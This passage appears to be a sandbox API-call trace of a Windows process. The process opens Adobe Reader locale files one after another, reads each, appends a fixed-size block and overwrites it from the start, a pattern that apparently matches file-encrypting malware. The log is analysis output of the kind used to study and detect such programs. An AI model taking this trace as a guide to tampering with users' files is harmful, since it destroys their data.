lpUsedDefaultChar=0x0) returned 10 [0078.016] ReadFile (in: hFile=0x1dc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0078.052] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1f000 [0078.053] ReadFile (in: hFile=0x1dc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.077] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1f000 [0078.077] WriteFile (in: hFile=0x1dc, lpBuffer=0x2669898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.078] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0078.078] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0078.078] CloseHandle (hObject=0x1dc) returned 1 [0078.089] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\PPKLite.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\ppklite.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0078.090] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0078.091] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x82000 [0078.091] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0078.091] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.091] ReleaseMutex (hMutex=0x168) returned 1 [0078.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLite.HUN", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0078.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLite.HUN", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLite.HUN", lpUsedDefaultChar=0x0) returned 11 [0078.091] ReadFile (in: hFile=0x1e8, lpBuffer=0x288ade8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0078.104] ReadFile (in: hFile=0x1e8, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.504] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x81000 [0078.505] ReadFile (in: hFile=0x1e8, lpBuffer=0x25ad0d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25ad0d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.540] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x81000 [0078.541] WriteFile (in: hFile=0x1e8, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.542] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0078.542] WriteFile (in: hFile=0x1e8, lpBuffer=0x289ae18*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x289ae18*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0078.542] WriteFile (in: hFile=0x1e8, lpBuffer=0x289ae18*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x289ae18*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0078.543] CloseHandle (hObject=0x1e8) returned 1 [0078.543] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0078.544] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0078.544] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xe8 [0078.544] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0078.544] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.545] ReleaseMutex (hMutex=0x168) returned 1 [0078.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0078.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0078.545] ReadFile (in: hFile=0x1e8, lpBuffer=0x26bedf8, nNumberOfBytesToRead=0xe8, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26bedf8*, lpNumberOfBytesRead=0x2e9f2bc*=0xe8, lpOverlapped=0x0) returned 1 [0078.546] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0078.546] WriteFile (in: hFile=0x1e8, lpBuffer=0x25a0038*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a0038*, lpNumberOfBytesWritten=0x2e9f2d0*=0x670, lpOverlapped=0x0) returned 1 [0078.547] CloseHandle (hObject=0x1e8) returned 1 [0078.547] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\BRdlang32.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\brdlang32.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0078.548] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0078.548] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3400 [0078.548] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0078.548] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.548] ReleaseMutex (hMutex=0x168) returned 1 [0078.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.ITA", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0078.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.ITA", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.ITA", lpUsedDefaultChar=0x0) returned 13 [0078.549] ReadFile (in: hFile=0x1e8, lpBuffer=0x25ad0d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25ad0d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.550] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2400 [0078.550] ReadFile (in: hFile=0x1e8, lpBuffer=0x25ad0d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25ad0d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.551] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2400 [0078.551] WriteFile (in: hFile=0x1e8, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.551] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0078.551] WriteFile (in: hFile=0x1e8, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0078.552] CloseHandle (hObject=0x1e8) returned 1 [0078.552] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Multimedia.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\multimedia.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0078.553] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0078.553] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x14200 [0078.553] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0078.553] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.553] ReleaseMutex (hMutex=0x168) returned 1 [0078.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.ITA", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0078.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.ITA", cchWideChar=14, lpMultiByteStr=0x1f7356c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.ITA", lpUsedDefaultChar=0x0) returned 14 [0078.554] ReadFile (in: hFile=0x1e8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0078.710] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x13200 [0078.710] ReadFile (in: hFile=0x1e8, lpBuffer=0x25ad0d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25ad0d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.735] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x13200 [0078.735] WriteFile (in: hFile=0x1e8, lpBuffer=0x2669898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.735] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0078.735] WriteFile (in: hFile=0x1e8, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0078.735] CloseHandle (hObject=0x1e8) returned 1 [0078.736] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\SendMail.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\sendmail.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0078.736] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0078.736] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3e00 [0078.736] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0078.736] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.736] ReleaseMutex (hMutex=0x168) returned 1 [0078.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.ITA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.ITA", cchWideChar=12, lpMultiByteStr=0x1f7360c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.ITA", lpUsedDefaultChar=0x0) returned 12 [0078.737] ReadFile (in: hFile=0x1e8, lpBuffer=0x2669898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.760] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2e00 [0078.760] ReadFile (in: hFile=0x1e8, lpBuffer=0x2669898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.815] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2e00 [0078.815] WriteFile (in: hFile=0x1e8, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.816] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0078.817] WriteFile (in: hFile=0x1e8, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0078.817] CloseHandle (hObject=0x1e8) returned 1 [0078.817] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\AdobeCollabSync.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\adobecollabsync.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0078.818] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0078.818] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1a00 [0078.818] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0078.818] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.818] ReleaseMutex (hMutex=0x168) returned 1 [0078.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.JPN", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0078.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.JPN", cchWideChar=19, lpMultiByteStr=0x1f88ba4, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.JPN", lpUsedDefaultChar=0x0) returned 19 [0078.818] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2e9f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0078.904] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0078.904] WriteFile (in: hFile=0x1e8, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0078.905] CloseHandle (hObject=0x1e8) returned 1 [0078.905] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\IA32.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\ia32.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0078.905] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0078.905] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xc00 [0078.906] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0078.906] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.906] ReleaseMutex (hMutex=0x168) returned 1 [0078.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.JPN", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0078.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.JPN", cchWideChar=8, lpMultiByteStr=0x1f735ac, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.JPN", lpUsedDefaultChar=0x0) returned 8 [0078.906] ReadFile (in: hFile=0x1e8, lpBuffer=0x25ab2a8, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25ab2a8*, lpNumberOfBytesRead=0x2e9f2bc*=0xc00, lpOverlapped=0x0) returned 1 [0078.983] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0078.983] WriteFile (in: hFile=0x1e8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1188, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1188, lpOverlapped=0x0) returned 1 [0078.983] CloseHandle (hObject=0x1e8) returned 1 [0078.984] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\SaveAsRTF.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\saveasrtf.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0078.984] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0078.984] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3800 [0078.984] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0078.985] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.985] ReleaseMutex (hMutex=0x168) returned 1 [0078.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.JPN", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0078.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.JPN", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.JPN", lpUsedDefaultChar=0x0) returned 13 [0078.985] ReadFile (in: hFile=0x1e8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.105] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2800 [0079.105] ReadFile (in: hFile=0x1e8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.149] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) 